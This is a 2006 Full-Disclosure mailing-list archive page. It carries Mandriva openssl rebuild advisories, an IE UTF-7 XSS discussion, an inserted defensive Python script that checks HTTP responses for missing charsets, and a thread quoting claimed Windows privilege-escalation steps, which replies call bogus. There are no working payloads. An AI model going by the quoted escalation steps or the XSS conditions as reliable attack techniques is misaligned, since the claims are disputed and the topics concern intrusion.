2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm
 ca169246cc85db55839b265b90e8c842  
2006.0/x86_64/openssl-0.9.7g-2.5.20060mdk.x86_64.rpm 
 441a806fc8a50f74f5b4bcfce1fc8f66  
2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm

 Mandriva Linux 2007.0:
 db68f8f239604fb76a0a10c70104ef61  
2007.0/i586/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm
 26a4de823aee08e40d28ed7e6ff5b2ff  
2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm
 ab949cf85296ceae864f83fbbac2b55a  
2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm
 a97c6033a33fabcd5509568304b7a988  
2007.0/i586/openssl-0.9.8b-2.2mdv2007.0.i586.rpm 
 78964615b7bd71028671257640be3bc5  
2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 1895971ef1221056075c4ee3d4aaac72  
2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.2mdv2007.0.x86_64.rpm
 cfd59201e5e9c436f42b969b4aa567f1  
2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm
 36da85c76eddf95feeb3f4b792528483  
2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm
 db68f8f239604fb76a0a10c70104ef61  
2007.0/x86_64/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm
 26a4de823aee08e40d28ed7e6ff5b2ff  
2007.0/x86_64/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm
 ab949cf85296ceae864f83fbbac2b55a  
2007.0/x86_64/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm
 e3aebeae455a0820c5f28483bd6d3fa5  
2007.0/x86_64/openssl-0.9.8b-2.2mdv2007.0.x86_64.rpm 
 78964615b7bd71028671257640be3bc5  
2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm

 Corporate 3.0:
 7f60837e42b45ce50f365ec1372d6aeb  

[Full-disclosure] [ MDKSA-2006:177 ] - Updated MySQL packages rebuilt against updated openssl.

2006-10-02 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:177
 http://www.mandriva.com/security/
 ___
 
 Package : MySQL
 Date: October 2, 2006
 Affected: 2006.0, Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 Openssl recently had several vulnerabilities which were patched
 (CVE-2006-2937, CVE-2006-2940, CVE-2006-3738, CVE-2006-4339,
 CVE-2006-4343). Some MySQL versions are built against a static copy of
 the SSL libraries. As a precaution an updated copy built against the
 new libraries is being made available.
 ___

 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 

Re: [Full-disclosure] Security Rss Feeds

2006-10-02 Thread Gareth Davies
crazy frog crazy frog wrote:
 Hi,

 Please share various security related rss feeds you read daily.

 Thanks,
 -CF

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

http://feeds.feedburner.com/darknethackers is pretty useful too and 
hasn't been mentioned yet.

I also subscribe to some general ones like Register Security feed, 
digg/security, cnet security.

Cheers.

-- 
Gareth Davies - ISO 27001 LA, OPST

Manager - Security Practice

Network Security Solutions MSC Sdn. Bhd.
Suite E-07-21, Block E, Plaza Mont' Kiara, No. 2 Jalan Kiara,
Mont’ Kiara, 50480
Kuala Lumpur, Malaysia 
Phone: +603-6203 5303 or +603-6203 5920

www.mynetsec.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])

2006-10-02 Thread Paul Szabo
Brian Eaton [EMAIL PROTECTED] wrote:

 ... I just tested Apache 1.3.37 and Apache 2.2.3, and both specified a
 content-type header of text/html; charset=iso-8859-1 for 404 responses ...

So, how default were your servers? On my own server (Debian package
apache2-common version 2.0.54-5sarge1) I see in apache2.conf:

  <IfModule mod_negotiation.c>
  <IfModule mod_include.c>
  Alias /error/ /usr/share/apache2/error/
  ...
  ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
  ...
  </IfModule>
  </IfModule>

but those modules are not mentioned in any LoadModule lines. The attack
worked fine also against a certain HTTPS server of interest here at USyd.

Would seem that if Apache is internationalized with those error messages
then you are safe, but not if you kept things simple.

The bug is not in Apache, but in IE. Why would all web servers need to
specify some charset for each and every webpage...

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of SydneyAustralia

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
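
As an added example that is not part of the thread, the following Python check applies the two conditions Paul relies on (no charset declared in Content-Type, and an error body larger than 512 bytes) to constructed raw HTTP responses, so a server's own error pages can be audited for exposure to IE's charset auto-selection.

```python
"""Check whether an HTTP response is exposed to Internet Explorer's UTF-7 charset
auto-detection (the condition behind the UXSS discussed in this thread).
Added example, not code from the thread or from Apache.  It encodes the two facts the
thread relies on: IE picks the charset itself only when Content-Type declares none,
and IE shows its own page instead of an error body of 512 bytes or less.  All
sample responses below are constructed."""
import re

IE_FRIENDLY_ERROR_LIMIT = 512  # bytes; IE never renders a smaller error body

def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status code, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    status = int(status_line.split()[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body

def declared_charset(headers):
    """Return the charset parameter of Content-Type, or None when the server sent none."""
    match = re.search(r'charset\s*=\s*"?([\w.:-]+)', headers.get("content-type", ""), re.I)
    return match.group(1).lower() if match else None

def utf7_sniff_exposure(raw: bytes):
    """Return (exposed, reason); exposed is True when IE may choose the charset itself."""
    status, headers, body = parse_response(raw)
    media_type = headers.get("content-type", "").split(";")[0].strip().lower()
    if media_type != "text/html":
        return False, "not an HTML document, nothing to sniff"
    charset = declared_charset(headers)
    if charset:
        return False, "server declared charset=%s, auto-select not used" % charset
    if status >= 400 and len(body) <= IE_FRIENDLY_ERROR_LIMIT:
        return False, "error body of %d bytes is replaced by IE's own page" % len(body)
    return True, "text/html without charset; IE 'Auto Select' may pick UTF-7"

def http_response(status_line: str, content_type: str, body: bytes) -> bytes:
    """Assemble a constructed raw response for the cases below."""
    head = "%s\r\nContent-Type: %s\r\nContent-Length: %d\r\n\r\n" % (status_line, content_type, len(body))
    return head.encode("iso-8859-1") + body

# Constructed Apache-style 404 body, natural size and padded with a long reflected path.
SHORT_404 = (b"<html><body><h1>Not Found</h1><p>The requested URL /xyz was not found "
             b"on this server.</p></body></html>")
PADDED_404 = SHORT_404.replace(b"/xyz", b"/" + b"Z" * 600)
CASES = {
    "charset declared, padded": http_response("HTTP/1.1 404 Not Found", "text/html; charset=iso-8859-1", PADDED_404),
    "no charset, short body": http_response("HTTP/1.1 404 Not Found", "text/html", SHORT_404),
    "no charset, padded body": http_response("HTTP/1.1 404 Not Found", "text/html", PADDED_404),
    "no charset, ordinary page": http_response("HTTP/1.1 200 OK", "text/html", b"<html><body>hi</body></html>"),
}

if __name__ == "__main__":
    for name, raw in CASES.items():
        exposed, reason = utf7_sniff_exposure(raw)
        print("%-26s exposed=%-5s %s" % (name, exposed, reason))
```

The 512-byte rule is applied only to error statuses: an ordinary 200 page served as text/html without a charset is flagged regardless of size.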


[Full-disclosure] [ MDKSA-2006:178 ] - Updated ntp packages rebuilt against updated openssl.

2006-10-02 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:178
 http://www.mandriva.com/security/
 ___
 
 Package : ntp
 Date: October 2, 2006
 Affected: 2006.0, 2007.0, Corporate 4.0
 ___
 
 Problem Description:
 
 Openssl recently had several vulnerabilities which were patched
 (CVE-2006-2937, CVE-2006-2940, CVE-2006-3738, CVE-2006-4339,
 CVE-2006-4343). Some versions of ntp are built against a static copy of
 the SSL libraries. As a precaution an updated copy built against the new
 libraries is being made available.
 ___

 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFIV//mqjQ0CJFipgRApEqAKDfrtPm9LmOw+FoQffcDyJ5TQ0UnwCdHole
JlZ71gXVFcj6A7k9cyBnzI0=
=T73Y
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Truths in Truth in Caller ID Act

2006-10-02 Thread Nancy Kramer
You are 100 percent right about the US government.  The US Constitution may 
protect US citizens from the government but nothing will protect them from 
the big telecom companies who will own them and their data unless we enact 
a new neutrality law in the US.

Regards,

Nancy Kramer
Webmaster http://www.americandreamcars.com
Free Color Picture Ads for Collector Cars
One of the Ten Best Places To Buy or Sell a Collector Car on the Web


At 04:48 PM 10/1/2006, Joe Barr wrote:

On Sun, 2006-10-01 at 12:28 -0500, J. Oquendo wrote:
  So the United States government wants to pass the Truth in Caller ID
  act. Humorously it will do little to deter criminals from spoofing
  their caller ID and scamming innocent victims. Here is the rule/law
  followed by why it will fail:

The U.S. government will do its duty, that is to say, they will lick the
ass of the telecommunications industry lobbyists and do whatever they
damn well say.





--
It's a strange world when proprietary software is not worth stealing,
but free software is.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/







___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Truths in Truth in Caller ID Act

2006-10-02 Thread Gary E. Miller
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Yo Nancy!

On Mon, 2 Oct 2006, Nancy Kramer wrote:

 the big telecom companies who will own them and their data unless we enact
 a new neutrality law in the US.

Yeah, but guess who wrote the net neutrality laws being voted on now?

RGDS
GARY
- ---
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
[EMAIL PROTECTED]  Tel:+1(541)382-8588

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFFIcb68KZibdeR3qURAt21AKDYnZbDwH48cLuf8sGOrHyzxhXVIACgoCUY
Z61iwKwZkShAyBJrIu66BuY=
=NGtb
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Truths in Truth in Caller ID Act

2006-10-02 Thread Nancy Kramer
I know it was the big telecoms.  Been working for Net Neutrality to 
preserve it.

Think they should just scrap their telecom reform bill.  Only helps the big 
telecoms.  Do you know they want to do deep packet inspection on every 
packet to prioritize them.  Going to be a huge security hole.  I am 
neither a network engineer nor security engineer but deep packet inspection 
scares the crap out of me.  Congress is clueless.  They just want the 
campaign contributions of the big telecoms.  I consider them owned by the 
telecoms in the hacker sense of owned.

I am already seeing peering issues as the ISPs start to play with the 
new toys, i.e. new Cisco routers.

Regards,

Nancy Kramer
Webmaster http://www.americandreamcars.com
Free Color Picture Ads for Collector Cars
One of the Ten Best Places To Buy or Sell a Collector Car on the Web




At 10:12 PM 10/2/2006, Gary E. Miller wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Yo Nancy!

On Mon, 2 Oct 2006, Nancy Kramer wrote:

  the big telecom companies who will own them and their data unless we enact
  a new neutrality law in the US.

Yeah, but guess who wrote the net neutrality laws being voted on now?

RGDS
GARY
- ---
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
 [EMAIL PROTECTED]  Tel:+1(541)382-8588

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFFIcb68KZibdeR3qURAt21AKDYnZbDwH48cLuf8sGOrHyzxhXVIACgoCUY
Z61iwKwZkShAyBJrIu66BuY=
=NGtb
-END PGP SIGNATURE-








___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])

2006-10-02 Thread Paul Szabo
Seems that I was wrong and Brian Eaton [EMAIL PROTECTED] was right:
default apache installations seem to return an explicit charset in their
error message. (Now I cannot explain how I convinced myself otherwise.)
Then there is no Universal XSS against default Apache webservers...

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of SydneyAustralia

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Removing the NIC cable = EoP?

2006-10-02 Thread Krainium

This seems to me to be more of a poor policy configuration.  In Windows
XP, the policy settings 'Local Policies/' 'Log on locally' and 'Deny
logon locally' should prevent what this person is claiming (given proper
policy settings).  They did not identify a specific OS, but I assume
it's XP.

I haven't tried it, but that's my first impression.


 Hi list,
 
 recently I came across this link:
 http://evolvedlight.co.uk/?p=6
 
 I searched around but didn't find anything more specific about this,
 kinda, EoP. Can someone actually confirm this is working? Any
 information would be much appreciated.
 
 Thank you.
 
 -E.
 
 
 
 http://www.email.si/
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [SECURITY] [DSA 1185-2] New openssl packages fix arbitrary code execution

2006-10-02 Thread Luciano Faletti

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Removing the NIC cable = EoP?

2006-10-02 Thread Pink Hat
This doesn't work on XP. Pulling the network cable *does not* cause the machine to default to local administrator. From the lame post:

Login on the computer, and wait for the login window to disappear. Pull the network cable out of the wall. After about 30 seconds you will see the message that "could not retrieve local profile". It now loads up into the LOCAL administrator mode


Think about this for just a second. Think about how Windows has worked with profiles since pretty much forever. The profile will be (unless configured otherwise) cached on the local machine. If configured to not be cached on the local machine you will either be given a default desktop (in luser land not local admin) and in some cases (older windows versions) you won't be allowed to login.


So either the post is complete baloney or there is something badly misconfigured.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/